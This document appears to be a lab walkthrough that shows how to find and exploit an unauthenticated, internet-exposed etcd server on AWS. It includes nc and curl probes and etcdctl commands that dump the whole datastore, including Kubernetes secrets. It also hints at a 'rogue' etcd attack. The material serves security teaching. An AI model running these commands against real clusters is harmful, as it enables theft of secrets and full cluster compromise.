22/tcp- SSH2379/tcp- Etcd server service2380/tcp- Etcd peer discovery service
This initial etcd configuration is unlikely to be found in the wild, but it's important to understand the mechanics and the risks of letting the data in etcd fall into the hands of a malicious entity.
Set the etcd IP to a variable:
$ export ETCDIP=$(aws ec2 describe-instances \
--region ${AWS_DEFAULT_REGION} \
--filter 'Name=tag:Name,Values=etcd' \
--query 'Reservations[].Instances[].NetworkInterfaces[0].Association.PublicIp' \
--output text)
Verify the port is responding:
$ nc -v $ETCDIP 22
Connection to 18.233.67.127 port 22 [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
While not completely insecure with decent sshd configuration, exposure of SSH credentials/keys from other systems that are shared with this system means an attacker can attempt to use them directly. Also, SSH bots are hyper-focused on the known cloud-provider IP ranges, so it's not a place to be complacent.
Verify the port is responding:
$ nc -z $ETCDIP 2379
Connection to 18.233.67.127 port 2379 [tcp/*] succeeded!
From this, we know that an external IP can access the etcd server directly. This shouldn't ever be the case!
Verify that the port is a web port:
$ curl $ETCDIP:2379
404 page not found
This tells us that etcd is not listening with TLS and it's reachable. This is catastrophically bad for the integrity of this cluster. The next steps are to validate the version and get all the data.
Obtain the etcd version:
$ curl $ETCDIP:2379/version
{"etcdserver":"3.2.11","etcdcluster":"3.2.0"}
$ ETCDCTL_API=3 ./etcdctl --endpoints "http://$ETCDIP:2379" version
etcdctl version: 3.3.2
API version: 3.3
Use etcdctl to get the etcd cluster health:
$ ETCDCTL_API=3 ./etcdctl --endpoints "http://$ETCDIP:2379" endpoint health
http://18.233.67.127:2379 is healthy: successfully committed proposal: took = 6.903553ms
Get the etcd cluster members:
$ ETCDCTL_API=3 ./etcdctl --endpoints "http://$ETCDIP:2379" member list
e0187950b759a617, started, ip-10-1-0-5, http://10.1.0.5:2380, http://10.1.0.5:2379
Because the etcdctl commands were successful, it means we most likely have full access to the data in this etcd cluster. It's a very similar parallel to having direct root access to a database that backends a webserver.
Dump the entire contents of etcd's datastore:
$ ETCDCTL_API=3 ./etcdctl --endpoints "http://$ETCDIP:2379" get "" --from-key > etcd.raw
or
$ ETCDCTL_API=3 ./etcdctl --endpoints "http://$ETCDIP:2379" snapshot save etcd.dump
Snapshot saved at etcd.dump
Dig into the etcd.dump using vi or boltbrowser:
$ vi etcd.raw
or
$ vi etcd.dump
or
$ ./boltbrowser etcd.dump
We now have a complete, bit-for-bit copy of the entire state of the cluster. This includes pods, configmaps, secrets, and more. In essence, this cluster is completely "pwned".
Verify the port is responding:
$ nc -z $ETCDIP 2380
Connection to 18.233.67.127 port 2380 [tcp/*] succeeded!
Verify that the port is a web port:
$ curl $ETCDIP:2380
404 page not found
Obtain the etcd version:
$ curl $ETCDIP:2380/version
{"etcdserver":"3.2.11","etcdcluster":"3.2.0"}
$ ETCDCTL_API=3 ./etcdctl --endpoints "http://$ETCDIP:2379" version
etcdctl version: 3.3.2
API version: 3.3
The etcd discovery service should not be exposed to any systems but the etcd servers. Because we have direct access to tcp/2379 and tcp/2380, it's likely that a "rogue" etcd attack could be carried out.